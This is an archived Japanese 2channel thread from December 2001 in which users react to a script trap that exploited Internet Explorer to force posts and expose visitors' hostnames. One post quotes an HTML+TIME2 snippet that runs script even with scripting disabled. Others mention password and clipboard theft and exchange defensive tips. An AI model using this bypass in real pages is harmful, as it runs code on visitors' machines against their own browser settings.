心得をよく読みましょう:01/12/18 00:14 ID:ZrcN9tWg
ひろゆきは何人兄弟ということで落ち着きましたか?
>>558 2chに限らず他でも流用可能であることがわかっている以上
被害拡大を防ぐためにはソース流出を最小限に押さえる必要
があると思われ
582 :
578:01/12/18 00:14 ID:hQmIuZyc
あっ、行けた。スマソ
584 :
:01/12/18 00:14 ID:gmKqd3a2
ラウンジに糞スレ立てれないから戻して〜
585 :
104:01/12/18 00:14 ID:pkTuEHYy
>>574 /^
で、「先頭が」 2ch.net じゃないと引っかかるので100%大丈夫です。
正規表現勉強してから出直してね。
って漏れもでかいこと言えないけど
あららららららら?
半角見れるけどカキコが出来ない
589 :
104:01/12/18 00:15 ID:pkTuEHYy
>>575 だからスクリプトでリファラを書き換えられるというのは
漏れが流したデマ。IEにそんな機能は存在しない。
590 :
568:01/12/18 00:15 ID:8QbAKP/W
591 :
名無し:01/12/18 00:16 ID:vfjMcdMD
【裏2Ch踏んじゃダメ】 2Chを蝕むウィルス大増殖
http://news.2ch.net/test/read.cgi/newsplus/1008578204/ 309 名前:名無しさん@お腹いっぱい。 投稿日:01/12/18 00:14 ID:PMyYYMl7
とりあえず模倣犯人を1名発見
YahooBB218138012096.bbtec.net.2ch.net
こいつ大量にばらまいている
310 名前:名無しさん@お腹いっぱい。 投稿日:01/12/18 00:14 ID:PMyYYMl7
あ、ごめん、ゴミがついた
YahooBB218138012096.bbtec.net
こいつ
スクリプトのソース、合計5個も拾っちゃった。。
わは。
yasai
salad
www2.bbspink.com
594 :
心得をよく読みましょう:01/12/18 00:16 ID:it/dqncN
漏れのID凄いよね〜
595 :
578:01/12/18 00:16 ID:hQmIuZyc
>>589 あ、そか。なんか勘違い(藁 ちゃんと厳密にチェックすればおけなのね。
ところで、今回の騒動の吉野家とか、数を数えるやつはまだ出来てないの?
作ってみようかな
600 :
597:01/12/18 00:17 ID:7Y/9+6go
601 :
名無し:01/12/18 00:18 ID:vfjMcdMD
602 :
心得をよく読みましょう:01/12/18 00:18 ID:9aT/CaI4
だいぶマターリしてきたねぇ……
605 :
心得をよく読みましょう:01/12/18 00:20 ID:UYK8dQ+E
もうトラップのアドレス書けないのね。
対策スレ立てれなくてムカついてたよヽ(´ー`)ノ
606 :
それはDQN君:01/12/18 00:20 ID:it/dqncN
ではそろそろレポート書きに逝きます。
最後に…
ぁゃtぃURLはラウンジで鑑定出してね
終わりやね。
DQN4でもやろっと
609 :
心得を(略):01/12/18 00:23 ID:GQKVUaiB
(▽Д▽)y ─┛~~ 対策できてる…?
610 :
心得をよく読みましょう:01/12/18 00:23 ID:b+BmCZLj
247 名前:心得をよく読みましょう 投稿日:01/12/17 23:32 ID:MD8a3qzu
今、夜勤さんとか運営側のみなしゃんはどんなことををやってるでつか?
251 名前:ひろゆき ◆L3IpNS4A 投稿日:01/12/17 23:33 ID:OX3PDCbq
とりあえず、うまい棒を食べてたりします。
260 名前:CC名無したん 投稿日:01/12/17 23:34 ID:DabjbDIY
>>251 一人だけマターリしないでくれ
264 名前:実は鑑定人 投稿日:01/12/17 23:34 ID:FWmmQZP/
>>251 あなた…やっぱ管理人だわ(硝酸
てすと
613 :
◆7qDGa.4o :01/12/18 00:24 ID:Mw87SKeK
テレ東見れ!
iモード対応携帯電話より、インターネット経由でWEBサーバにアクセスする際、WEBサーバ側に通知される送信元のIPアドレス(iモードサーバ内のファイアウォールサーバのIPアドレス)は以下の帯域内のアドレスとなります。
210.153.84.0/24
210.136.161.0/24
FOMA iモード
203.138.45.0/24
location.replace(location.href+'?'+t1)
つまりこの部分でteri.2ch.netとかaccuseが含まれるURLに飛ばしてから投稿させてるわけ?
617 :
名無し:01/12/18 00:26 ID:vfjMcdMD
618 :
:01/12/18 00:27 ID:gmKqd3a2
どっかのスレに、ウィルスチェックしたらトロイに感染してたってあったけど、
俺もだった。
踏んだやつはチェックしたほうがいいかも。
>>614 俺のすんでるところにはテレ東ないさぁ……
623 :
あるてい:01/12/18 00:29 ID:VrhkafNe
>621
まじで?
中川家が人妻と風呂に入ってる
http://info.ezweb.ne.jp/factory/tec/spec/ezsava_ip.html No IPアドレス サブネットマスク(bit)
1 210.169.40.0 /24
2 210.196.3.192 /26
3 210.196.5.192 /26
4 210.230.128.0 /24
5 210.230.141.192 /26
6 210.234.105.32 /29
7 210.234.108.64 /26
8 210.251.1.192 /26
9 210.251.2.0 /27
10 211.5.1.0 /24
11 211.5.2.0 /24
12 211.5.7.0 /24
13 61.117.0.0 /24
14 61.117.1.0 /25
15 61.202.3.0 /24
626 :
心得をよく読みましょう:01/12/18 00:29 ID:wW+i5yQo
627 :
心得をよく読みましょう:01/12/18 00:29 ID:9aT/CaI4
628 :
:01/12/18 00:30 ID:FonmILdW
また半角があれてるよ〜
IPより、UAで見た方が簡単なのでは…
631 :
名無し:01/12/18 00:32 ID:vfjMcdMD
止まってる(笑)
つうか半角繋がらん・・・
633 :
心得をよく読みましょう:01/12/18 00:33 ID:9aT/CaI4
634 :
621:01/12/18 00:33 ID:fTv5zk7d
心配なのでやってみるべ。
まあウイルス踏んだとしてもHDこわれとる
からいいや
すみません、詳しい人に聞きたいのですが、
セキュリティの設定で「暗号化されていないフォームデータの送信」に
ダイアログを出すようにしていれば書き込み回避できるんでしょうか?
638 :
ニュース板より転載:01/12/18 00:38 ID:1OoK+40E
309 名前:名無しさん@お腹いっぱい。 :01/12/18 00:14 ID:PMyYYMl7
とりあえず模倣犯人を1名発見
YahooBB218138012096.bbtec.net.2ch.net
こいつ大量にばらまいている
310 名前:名無しさん@お腹いっぱい。 :01/12/18 00:14 ID:PMyYYMl7
あ、ごめん、ゴミがついた
YahooBB218138012096.bbtec.net
こいつ
313 名前:(・∀・)マターリイイ ◆UqQUyPuI :01/12/18 00:24 ID:kRKEbA0D
バカーチガウヨ!!!!!
310ノワフンダヤツダヨ
316 名前:名無しさん@お腹いっぱい。 :01/12/18 00:27 ID:PMyYYMl7
>>313 いや、踏むにしても20回連続で踏み、スレも建てられる限り立てている
わざとやっていると思われる
317 名前:名無しさん@お腹いっぱい。 :01/12/18 00:29 ID:PMyYYMl7
しかもだな、おなじ板の中だけで閉じている筈なのに
違う板に飛び火したかのごとく投げつけているのは、
おそらくファイルを改ざんして被害者のふりをして
被害を拡大させているとおもわれる。
318 名前:名無しさん@お腹いっぱい。 :01/12/18 00:33 ID:PMyYYMl7
>>313,
>>314 で、とりあえずバカという言葉はお返しするよ。
対策されていないうちに、うわこいつ、模倣犯だ、とわかってても
手口まで示して指摘したら模倣犯が増えるだろう?
つうことで、あとはよろしく。
かきこ
640 :
やっと、:01/12/18 00:41 ID:ILUm1ABH
落ち着いたわいね。。
641 :
日向 マコト:01/12/18 00:42 ID:thsG3YCp
サーバー維持に支障発生!
834 : :01/12/17 22:52 ID:ic7RLSxJ
このプログラムを応用したら、プロバのパスワード表示されるようなのできたんだけど・・・
やばくね?
846 :834 :01/12/17 22:57 ID:ic7RLSxJ
パスワードが入ってるiniファイルを開いて、暗号解除して、
そのデータを自動FORMするだけ
949 :834 :01/12/17 23:47 ID:ic7RLSxJ
いや、ホントなんだが・・・
まあこれの場合ActiveX使ってるから、切っとけば大丈夫だけど、かなり悪質だと思う。
怖いからさすがに自分でも試せないよ。
643 :
伊吹 マヤ:01/12/18 00:43 ID:thsG3YCp
糞スレ乱立! 2ちゃんねらーに精神汚染が進んでいます!
644 :
心得をよく読みましょう:01/12/18 00:44 ID:9aT/CaI4
>>642 それは、ハードデイスク上でHTMLを表示しているから可能なだけであって、
ネット上のサーバーにアップロードされたものでは効果が無い。
だから安全。
645 :
冬月 コウゾウ:01/12/18 00:44 ID:thsG3YCp
いかん! 8月末までに転送量を60%カットだ!
646 :
心得をよく読みましょう:01/12/18 00:44 ID:xW9uyoma
647 :
碇 ゲンドウ:01/12/18 00:45 ID:thsG3YCp
待て.
精神汚染されるのは643と647で十分です
つか強制IDだぞ(w
649 :
冬月 コウゾウ:01/12/18 00:45 ID:thsG3YCp
しかし碇,このままでは2chが氏ぬぞ!
650 :
碇 ゲンドウ:01/12/18 00:46 ID:thsG3YCp
ひろゆき,なぜ戦わない?
放置?<ML
>>644 レスthx
どちらにしろ怖い事にはかわりないか。
今回も「JAVASCRIPT切れば大丈夫」ってのとか言っててダメなのがあったし。
しかしまぁ。
654 :
碇 ゲンドウ:01/12/18 00:47 ID:thsG3YCp
ひろゆき,なぜ戦わない!?
655 :
分かんない??:01/12/18 00:47 ID:NoIZMFN6
何か・・・大事件のご様子。
裏2あるとの事で覗いたら
ツボの絵があった。
入るの怖かったのですぐ閉じたんだけど
一体何があったのでしょう??
IP抜かれてるの?どうやって確かめるのかギボ〜ン
教えてちゃんですいません。
全部他のいろいろなスレッドの過去スレ読んでたんだけど
分かんないの。
へー。
657 :
◆7qDGa.4o :01/12/18 00:49 ID:Mw87SKeK
それと、某板でのスレッドたてまくりな話しですが、
触れると悪化しそうなので、放置しましょう。。。
えぇえぇ。。
だそうですw
>>655 このスレにたどりついたんならわかるだろうが……
659 :
寝助民:01/12/18 00:49 ID:bFoKLN13
ネスケは関係ないんでしょ?
660 :
分かんない??:01/12/18 00:50 ID:NoIZMFN6
ひろゆきよく寝る人みたいだから
まだ寝てるんじゃない?
気が付いてないのかも=寝てて
>>NoIZMFN6
このスレと前スレの過去ログくらい読みませう
心得をよく読みましょう、そしてログをよく読みましょう。
663 :
分かんない??:01/12/18 00:51 ID:NoIZMFN6
>658
それが分かんないの・・・ヴァカな私。
批判板は書き込みがみんな早いんだよね・・・
追いつけないんだよね。
メルマガきたねぇ
>>663 もう止まってる。安心して過去ログ読んで平気です。
666 :
心得をよく読みましょう:01/12/18 00:53 ID:ewdu0jQ5
いつからここはエヴァ板に…
「【危機】フシアナサントラップになんらかの対処を<2> 」
って言葉の意味が分からずにこのスレにきたのなら、
スレ違い、板違いを承知って事だよね。
んで、分かっててきたのなら、フシアナサンの意味わかるだろうし。
過去ログ読むのは基本だよ?
>>663 ( ゚д゚) ポカーン
ひろゆき うまい棒でこのスレと前スレ検索しる
メルマガ関係無いネタではないか
>>663 何がわからないのか教えてホスィ……(゚д゚)
やべ。。うちもトロイ出た。
ブラクラチェッカーか何かでリンク先のソースをチェックしないまま
ホイホイ見る奴の方がよほど問題。
ひろゆきのレス見たところで…
675 :
:01/12/18 00:56 ID:VuSu/LOC
これ画像が普通のエロ画像だったらみんな一生気付かずに
がんがん落ちてたんじゃないのか?
と思うと楽しい
676 :
分かんない??:01/12/18 00:56 ID:NoIZMFN6
専門用語(?)多いいし(@o@)
>>79 覗けば抜かれてるか抜かれてないか
分かるって事?
踏むのが怖いんだけど・・・
677 :
心得をよく読みましょう:01/12/18 00:58 ID:AIxiikIy
>>655>>676 マジレスします。
このスレの住民は状況の重大さを感じて、ピリピリしています。
このスレを最初から読めばそれが、あなたにも伝わるでしょう。
きついことを書きますが、
このスレを最初から読んでも状況の重大さを体感できない(理解はできなくてもいいです)ならば、
数日間、2chには来ないほうがよいと思います。
それほど大変なことが起こっているのです。
あなたの楽観的な書き込みが、住民たちの神経を逆なでしている可能性もあります。
678 :
マジレス:01/12/18 00:58 ID:ewdu0jQ5
679 :
:01/12/18 01:00 ID:VuSu/LOC
>>678 だまされたよう
こうやってほいほいクリックするからダメなのね
680 :
分かんない??:01/12/18 01:00 ID:NoIZMFN6
>>670 踏むとIPが抜かれるのがあるようですが
私も抜かれてるという事?
裏2は中を覗くと何か不味いことがあるのでしょうか?
いろいろ読んでもムズカチィ用語やらで分かんないよ〜!!
何度も戻って新スレ読もうとしても思いっきり進んでるしさ〜シクシク
>>678 今ウイルスチェック中だけに心臓に来る、、、
専門用語っつーかなんつーか、
「ふしあなさん」とかは説明書みたいなのに書いてあるし、
「IP抜かれる」とかいう言い方をしてるんならある程度知識あるだろうし。
ある程度2chで雰囲気を掴んだりするのは基本だし、
それをやってるなら「教えて君」がタブーってのも知ってるはずだよね。
それ以前に、何をしりたいのか具体的に言ってくれにゃぁ分からんよ。
683 :
心得をよく読みましょう:01/12/18 01:02 ID:jtB/qrfH
ハッキリ言って放置。
放置できない板も放置。
685 :
:01/12/18 01:02 ID:e2CdaciI
686 :
分かんない??:01/12/18 01:02 ID:NoIZMFN6
>>677 すいません。出直します。
>>678 どうもありがとうございます。
一度切ってみます。(その前にもう一度読もう・・・頭悪いの・・)
>名前:分かんない?? :01/12/18 01:00 ID:NoIZMFN6
書き込んでるヒマあったらログ読んできて下さい。
話はそれから。
>>673 ちょっと返事が遅れたけどマジ。
ちゃんと駆除できた、、、ハズ
694 :
心得をよく読みましょう:01/12/18 01:09 ID:6zP76xLX
695 :
677:01/12/18 01:09 ID:AIxiikIy
>>686 本スレの最初にリンクされている前スレを読むと
なんとなく状況がつかめると思います。
ウイルスバスターは時間かかるな。
697 :
心得をよく読みましょう:01/12/18 01:12 ID:jtB/qrfH
まだやってたみたいだけどそろそろまとめ希望。
ひろるき、がんばってるよ。
698 :
694:01/12/18 01:12 ID:6zP76xLX
ちょっと遅レスすぎだね
鬱なんで逝ってきます
>>686
まあ最初は誰でも初心者(俺もだけど)
そのうち慣れるよ
699 :
心得をよく読みましょう:01/12/18 01:16 ID:jtB/qrfH
この1スレから参加してたのだけど、ウイルスとか内蔵されてたの?
ソースを見たけど。
ひろゆき氏のまとめ。
> それと、某板でのスレッドたてまくりな話しですが、
> 触れると悪化しそうなので、放置しましょう。。。
> えぇえぇ。。
701 :
699:01/12/18 01:20 ID:jtB/qrfH
帰ってきて、このスレ2ができているので。
702 :
ひろぽん ★:01/12/18 01:20 ID:???
できたばっかりでしらないひとのほうがおおいからこれからたいへんかも・・・でち
704 :
分かった!!:01/12/18 01:21 ID:NoIZMFN6
ウザイ奴ですいませんでした〜
11時頃からいろいろ読んでて今やっと分かりました。
『モナー』がでなかったから大丈夫そうです(怖くて見れなかった)
今さら「お前が言うな」ですが
「踏んじゃだめなのを教えてくれるのに直リンで貼るな〜!!」
2ちゃん閉鎖すぐの騒ぎですね。
705 :
ぴろゆき:01/12/18 01:21 ID:yiY8DuHM
ひろゆきをこき使えばなんとかなるでち
706 :
心得をよく読みましょう:01/12/18 01:21 ID:jtB/qrfH
>>699 ウイルスではなく、IEのセキュリティホールを利用した
Javaスクリプトが仕込まれてました。
暫定対処はされた模様。
>>706 同意。さっぱりわからない。。俺がドキュンなのかと思った。
>>702 キタ━━━━━━(゚∀゚)━━━━━━━!!!!!
ロボみたいなのがいない
711 :
名無しさん@お馬で人生アウト:01/12/18 01:24 ID:AyDcesOp
712 :
ひろぽん ★:01/12/18 01:24 ID:???
キテヤッタ━━━━━━│◎ ◎│━━━━━━━!!!!! デチ
このできごと(じけん)になまえをつけるとしたら?
⊂(´-`⊂⌒`つ事件
糞、1時間かけてもウイルスチェック終わらん。
寝る!
┌───┐
│◎ ◎│Ψ
>>712 夜勤しゃんが、、あたふたした年の瀬。。。
>>712 CXのアナウンサー@レンジでチンするときに使ってね事件
718 :
これでち。:01/12/18 01:27 ID:x/TLZAKe
前の方であったけど、「2ch同時多発エロ」じゃなかったっけ?
720 :
ひろぽん ★:01/12/18 01:28 ID:???
>>714 「毎日のようにだまされる人が出続ける」ってことでち!
721 :
分かった!!:01/12/18 01:28 ID:NoIZMFN6
722 :
心得をよく読みましょう:01/12/18 01:29 ID:msdRda4H
723 :
714:01/12/18 01:30 ID:wDHc1tHA
>>720 りょうか〜い。なんとなくわかったでち!
724 :
心得をよく読みましょう:01/12/18 01:30 ID:AiUnx/vL
毎日のようにだまされる人が出続けるでち!事件
725 :
ひろぽん ★:01/12/18 01:30 ID:???
「ジサクジエンスクリプトだいじけん!」
726 :
心得をよく読みましょう:01/12/18 01:30 ID:jtB/qrfH
>720
解決してないジャン。
┌───┐
│◎ ◎│Ψ
>>725 2chじゃ、、まいにちでしゅ〜〜〜。。。
728 :
心得をよく読みましょう:01/12/18 01:32 ID:JUZVDDzf
>>ひろぽん
今はもう「うまい棒」は食べてないの?
730 :
心得をよく読みましょう:01/12/18 01:32 ID:msdRda4H
731 :
心得をよく読みましょう:01/12/18 01:33 ID:WvIRePEH
根本的な対策はなされてないのかな
騒いでる前からtatutaタンとこに突入してる連中いるけど
まぁ返事が楽しみだ、っと。
┌───┐
│◎ ◎│Ψ
>>729 ひろぽんはプリングルズでち。。。
734 :
心得をよく読みましょう:01/12/18 01:34 ID:jtB/qrfH
なんか大変だから、ひろぽんキャラをだしてきた。
いやだね。
735 :
心得をよく読みましょう:01/12/18 01:35 ID:jtB/qrfH
こちとら、真剣に考えていたのにね。
>>733 本当に?知らなかったよ。
つーか最近売ってた【クリスピーカレー味】、美味しいよね?
┌───┐
│◎ ◎│Ψ
>>736 ひろぽんはピザあじがすきでしゅ〜〜〜。。。
739 :
ひろぽん ★:01/12/18 01:41 ID:???
┌───┐
│◎ ◎│Ψ
「これからスクリプトをふみそうなひとにどれだけふまないようにさせるか・・」
だとおもうんでち
いとてきにふんでるひとも、もんだいでしゅけど・・
740 :
心得をよく読みましょう:01/12/18 01:41 ID:jtB/qrfH
>>737等
お前らスレ違いだから来るな。
ハウス!
741 :
名無し募集中。。。:01/12/18 01:42 ID:OGc5bA2I
うちのあプロだにzip圧縮で15.gifのスクリプトがあがってたんだけど
これ、ふんでも作動しないけど、あぷったやつ晒し上げた方がいいのかな?
>>740 >ハウス!
凍りそうになりました(゚д゚lll)
>>740 ひろぽんに絡む厨房 (・∀・)カコイイ!
744 :
心得をよく読みましょう:01/12/18 01:44 ID:GXvTi54K
>>741 ほどほどに晒したほうがおもろいと思うが
>>741 ひろゆきにメールでどうするか聞いてみたら?
747 :
心得をよく読みましょう:01/12/18 01:45 ID:WvIRePEH
技術的な対策は難しいのか。トーシロはすっこんでますね。
>>740 何をムキになってる。
癒し系キャラがわからないの?
>>743 ひろぽんは可
にせぽん以下は不可だと思う
なんでもOK >にせぽんでも何でも
マッタリできれば
殺伐とした出来事だからこそマッタリも必要
754 :
心得をよく読みましょう:01/12/18 01:47 ID:jtB/qrfH
おれ、ひろゆき好きだけど、ひろぽんキャラ嫌いなのです。
755 :
名無し募集中。。。:01/12/18 01:47 ID:OGc5bA2I
>744
>746
ん、ひろゆきにメールしてみる。
うちのあぷろだIPぶっこぬいてるし。
757 :
ひろぽん ★:01/12/18 01:48 ID:???
>>755 「それがかいけつのいとぐちになってくれればいいんでちけど・・」
>>757 キタ━━━━━━(゚∀゚)━━━━━━━!!!!!
>>754 嫌いなら放置じゃないのか?他の人がどう思ってるかわからんだろうに。
今日は★をよく見るなぁ……
766 :
メタりん:01/12/18 01:53 ID:pOGyuGt4
ひろぽんが・・・・(^_^;)
767 :
762:01/12/18 01:54 ID:WCcHQrQ3
768 :
心得をよく読みましょう:01/12/18 01:55 ID:7MO3k1qO
ひろぽんとひろゆきって同一人物なの?
770 :
768:01/12/18 01:57 ID:7MO3k1qO
771 :
ひろぽん ★:01/12/18 01:57 ID:???
つくったひともこんなおおさわぎになるとおもってたのかきになるでち!
ねらってたかのようなスクリプトでしゅけどね・・
そろそろねるでしゅ!
あびゃ
772 :
心得をよく読みましょう:01/12/18 01:58 ID:U3Zaj9CK
>>771 おやすみなさい。
なんかロボがいないとちょっと地味だな
774 :
心得をよく読みましょう:01/12/18 01:59 ID:jtB/qrfH
あいー
バイ!
今日は、御苦労さまでした。
(ヽ_ノ) / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
〜′ ̄ ̄( `へ´) < ひろぽんはAAあったほうが際立つな
、、)ノU ̄ ̄U、)ノ \____________
おやすみー
で…どうなった?
783 :
768:01/12/18 02:05 ID:7MO3k1qO
784 :
693:01/12/18 02:07 ID:wDHc1tHA
>>693 俺もトロイでました、、今回のと関係あるのか、無関係なのかわかりませんが。。
ただの日頃の不始末の予感は大いにあるが。
785 :
心得をよく読みましょう:01/12/18 02:08 ID:pnf7tKhQ
フシアナサントラップでウイルス感染しました(鬱
786 :
784:01/12/18 02:08 ID:wDHc1tHA
まちがえた。673です。
787 :
741:01/12/18 02:11 ID:OGc5bA2I
ひろゆきに ipいりまっかメールとスクリプトのzip
おくっといた。
>757
ほんと、これが解決の糸口になりゃいいんだがなぁ
788 :
741:01/12/18 02:13 ID:OGc5bA2I
でもなぁ、モ板住人の一部が使うあぷろだだからなぁ
犯人とは関係ないっぽいよな。
>>789 放置でいいんじゃね。
zipで圧縮してるからソースとしての利用だし
791 :
ちたん:01/12/18 02:24 ID:wf0Cby86
ぜんざい しめじ ひらめ えのき
ぜんざい しめじ ひらめ えのき
セフィロス!! セフィロス!!
なるほど
ソースを元に2ch側を対策させるんか
いたちごっこの予感・・
でもこれって犯罪だよね?>スクリプト貼った人
793 :
心得をよく読みましょう:01/12/18 02:24 ID:OGc5bA2I
>790
ソース流して、亜種の作成促すともとれる。
考えすぎ?
794 :
心得をよく読みましょう:01/12/18 02:28 ID:ewdu0jQ5
ふぅ。トロイもウイルスも検出されず…。
795 :
心得をよく読みましょう:01/12/18 02:29 ID:a9OgCbvn
チェッカーで試したらモナーが出てきた・・・
どこで漏れのIP晒されているんだろう
なんか鬱
発生元はどこなん?
797 :
ログ読むのしんどい:01/12/18 02:34 ID:SZWXN9kg
JAVA切ってても駄目なの?
>>797 今回のアレですが、
IE5.5、IE6ではjavascriptオフでも実行されてしまうそうです。
利用された仕様の部分
−−−−−−−−−−−−−−
強制的にスクリプトを実行
IE5.5以降 将来変更の可能性有
HTML+TIME2という新技術を応用して、スクリプトがOFFの状態でも強制的にスクリプトを実行してしまいます。ただし、ページのロード完了後にしか実行できませんので、document.write(〜)といった操作を行うスクリプトを使えません。
<script id=scr1 language=JScript for=window event=onload>
alert('Hello World!!');
</script>
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript>
800 :
心得をよく読みましょう:01/12/18 02:36 ID:H/TbYHGQ
これウイルス感染するのか?
802 :
ログ読むのしんどい:01/12/18 02:36 ID:SZWXN9kg
5.00だよ
803 :
ログ読むのしんどい:01/12/18 02:38 ID:SZWXN9kg
>>795 これだけ大量に晒されてりゃ埋もれてるよ。
気にするな。気にするな。気にするな。。。
気にしだしたら、俺なんかーーーー!!!(号泣
>>800 和塩のヤツがブラクラ付きだったから、もしかするとjavascriptオンの場合何かついてくるかも。
発生源よりも今は対策だろ?
PROXY規制ってでて他の板で書けなくなっちゃったんですが
これの暫定対策となにか関係あるんでしょうか?
某スレからの出張です
ウイルスとの関連ははっきりせんようですが
今日は随分とこのスクリプトの被害者いらっしゃいましたので一応お節介に参りました
この機会に(トラップが原因かどうかしれなくとも)ウイルス感染した方
よろしければどうぞ
http://www.trendmicro.co.jp/trial/freetool.htm こちらに各ウイルス対応の修復ツールがあります
ダウソして実行するだけなので自前の駆除ソフトない方お試しください
それでは差し出口失礼致しました
813 :
心得をよく読みましょう:01/12/18 08:47 ID:LuLEpIAw
今踏むとヤバイのどれ?だいたい対策とったんでしょ?
814 :
心得をよく読みましょう:01/12/18 09:03 ID:/ja0M8EO
815 :
心得を(略):01/12/18 09:10 ID:GQKVUaiB
あれ、まだ使えるトラップあります?
てst
クッキーをONにしてるのにエラーが出る…
819 :
心得をよく読みましょう:01/12/18 09:18 ID:LuLEpIAw
タツタたんはどうなったん?
820 :
pl637.nas911.a-nagoya.nttpc.ne.jp:01/12/18 09:18 ID:DIumUjr4
test
821 :
心得を(略):01/12/18 09:30 ID:GQKVUaiB
822 :
:01/12/18 09:33 ID:6AK7CkFv
823 :
心得をよく読みましょう:01/12/18 09:44 ID:LuLEpIAw
ほんもの?
826 :
ジョージ・プッシュ ◆dees2Brg :01/12/18 10:23 ID:JEYMo6SN
ひろゆき、謝罪メールキタ━━━━━━(゚∀゚)━━━━━━ !!!!!の?
827 :
心得をよく読みましょう:01/12/18 11:01 ID:mR2yNWdE
でもメールが来たという信憑性が無いぞ
828 :
心得をよく読みましょう:01/12/18 11:15 ID:bVM9xOZI
タツタが犯人に4チキンタツタ。
自分の鯖にうpする奴はいないだろ
830 :
心得をよく読みましょう:01/12/18 11:25 ID:WxWDj9QF
串アナさん
831 :
心得をよく読みましょう:01/12/18 11:29 ID:JymalYNN
まだやってるのか?ガキンチョども
>>829 最近は天然さんが多いからなんとも言えん…。
833 :
心得をよく読みましょう:01/12/18 11:59 ID:0IoeKzPm
これの対策で芋電話から書き込みできなくなったんだが
Googleで検索してもお絵描き掲示板上の方にないなぁ……
つーか、
お絵描き掲示板にファイルうpする裏技ってなんだよ(w
835 :
_:01/12/18 12:35 ID:JEYMo6SN
またもや引っかかった?(藁>漏れ
836 :
心得をよく読みましょう:01/12/18 12:36 ID:9aT/CaI4
Googleで「お絵かき掲示板 2ch poo」で検索して出てくる
お絵かき掲示板で外部から直リンできるところで最初に現れるのが
「お絵かき掲示板」www2j.biglobe.ne.jp/~tatuta /cgi-bin/paint/finish.html(picuture.cgiにリダイレクト)
poo siteのお絵かき掲示板のCGIは、単純にファイルの内容をPOSTするだけで誰でもファイルを投稿できます。
>>834 裏技というか、
(BBS NOTEであぷろだ機能がoffでも無理やり投稿する)ツールがあるべ。
838 :
一度も引っかからなかった人:01/12/18 13:58 ID:UsShn+nS
っていうか騒ぎすぎ。
連続投稿が続いて鯖が重くなったこと、削除人達の負担、スクリプト対応に追われる負担
などの物理的負担はよーくわかる。
被害を被ったひろゆき夜勤マァヴ猫あたりの管理サイドの奴らが
しかるべき対処法を取るならわかるよ。やれやれーって思うし。
ただそれ以外のクソ一般ユーザーが鼻息荒くして
責任取れ!!謝罪しる!!ってなってるのがワラえるんだよ。
自分がアホみたいに無防備だった結果
2ch閲覧者何千人にホスト晒して大恥かいた報復私怨を感じる(w
罠はかかるほうがヴァカ、ってガイドラインに書いてるだろーが(ゲラ
ヴァカが多かったから各種規制もキツクなっちまったーな。
俺もひっかからなかった。
知らずにやるから騙されるんですな。
840 :
いも:01/12/18 14:07 ID:SpAQpL37
芋復帰はいつ?
今朝の8時頃に、「かちゅ〜しゃ」でタ●タの15.gifを踏んだ私が書くのもな
んですが、気になることを書き込みます。
「fusianasanトラップ」の効果から考えて、このスクリプトを弄れば、任意の
メッセージを書き込むことも可能だと思います。
つまり、トラップにかかったコンピュータの情報や使用者の情報をJScri
−ptで得ることが出来れば、機密情報などを抜き取って晒すことが可能という
ことです。
そして、IEでは、これを実現できる可能性があります。
IEを使用している方は、以下を参考に、設定を見直すことをおすすめします。
IEのJScriptには、「クリップボードの内容を読み込む機能」があります。
どのバージョンから付いた機能かは知りませんが、少なくとも、IE5.5に
は、この機能が付いています。
クリップボードにパスワードなどの重要な情報をコピーする可能性があると思
う方は、以下を参考に、「クリップボードの内容を読み込む機能」を無効にする
ことをおすすめします。
1.メニューで
「ツール>インターネット オプション」をえらび、「インターネット オプショ
ン」のダイアログを出します。
2.「インターネット オプション」のダイアログで
「セキュリティ」をえらび、「レベルのカスタマイズ」を選択すると、「セキュ
リティの設定」ダイアログが開きます。
842 :
心得をよく読みましょう:01/12/18 14:10 ID:iDpWOXLV
引っ掛かったらどうすんの?
引っ掛かんなかった人は良いかもだけど引っ掛かったら普通騒ぐよ。
3.「セキュリティの設定」ダイアログで
「スクリプト>スクリプトによる貼り付け処理の許可」を無効にして下さい。
P.S.
私の思いつくトラップ対策としては、既出の「直リン禁止」の他に、「リンク
先への転送専用ページを用意して、トラップに与えるリファを転送専用ページの
ものにする。」という方法が思い浮かびましたが、トラップの方で板をねらい撃
ちされると、これらの方法では、お手上げです。
別の方法として、次のように、書き込みに規制をかける方法もありますが・・・。
私のHPに設置している掲示板では、数日、「掲示板自動書き込みソフト」に
よる連続投稿に悩まされたことがあったため、掲示板のスクリプトに外部から書
き込まれにくくする対策を施しました。
外部からの書き込みが不可能というわけではありませんが、この対策は、約1
年経過した現在でも有効に機能しています。
その時に使った方法やそれを強化した方法が今回のトラップにも有効だと考え
られるので、需要があるようでしたら、ひろゆき氏にメールを出そうと思います。
ただし、この対策の仕様を公開してしまうと、それに対応したトラップが出て
くる可能性があり、対策の意味が無くなるので、その影響で「かちゅ〜しゃ」な
どの専用ブラウザから書き込めなくなる可能性が高いと思います。
私自身は、「かちゅ〜しゃ」を使いたいのでこの対策はとって欲しくないので
すが、みなさんのお気持ちは、どうでしょうか?
今現在はメールを書けないため、テレホまで様子を見て、メールを送るかどう
か判断したいと思います。
以上。
長文、連続投稿、失礼しました。このレスが気にさわった方、ごめんなさい。
ふむ、いいんじゃない?
このさいIEのすばらしさを復活させよう。
必要な時は余計な事を言わずに即行動に移す、これが2ch流。。。
846 :
あのね:01/12/18 14:18 ID:JEYMo6SN
あぁ、ここにも厨房がいる。。。
>>838 私怨とか恥とかそういうレベルの問題ではないと思われ。
今回のトラップに引っかかってリモホさらされたユーザがどれだけ
多いことか。それでお前、DoS攻撃の踏み台候補が膨れ上がってるんだぞ。
今回のブラクラに引っかかる初心者にはポートスキャンのポの字もわかんない
奴が多いだろう。あわせてトロイが蔓延してるってうわさもあるし。
「2ちゃんねるユーザから大量DoS攻撃!踏み台に利用され」なんてニュース
でも建ってみろ。インターネット全体の問題だぞ。
引きこもってないでたまには社会に出(以下省略)
>>843 「掲示板自動書き込みソフト」と違いブラウザではRefererを
偽装することができないので、現状のままでも、
自動的に書き込めれるトラップが出てくる可能性は皆無です。
848 :
ほんちん ◆gItEvm/g :01/12/18 14:27 ID:Lz8QmdCv
みなさん漏れがみんなの研究用に一時的にウpした
ブラクラつきの亜種はウィルスなんてつけてませんで安心してください(削除済み)
んじゃ。
849 :
心得をよく読みましょう:01/12/18 14:49 ID:efinGxXu
いまさらだけど、よく訴えられないね、フシアナサンって
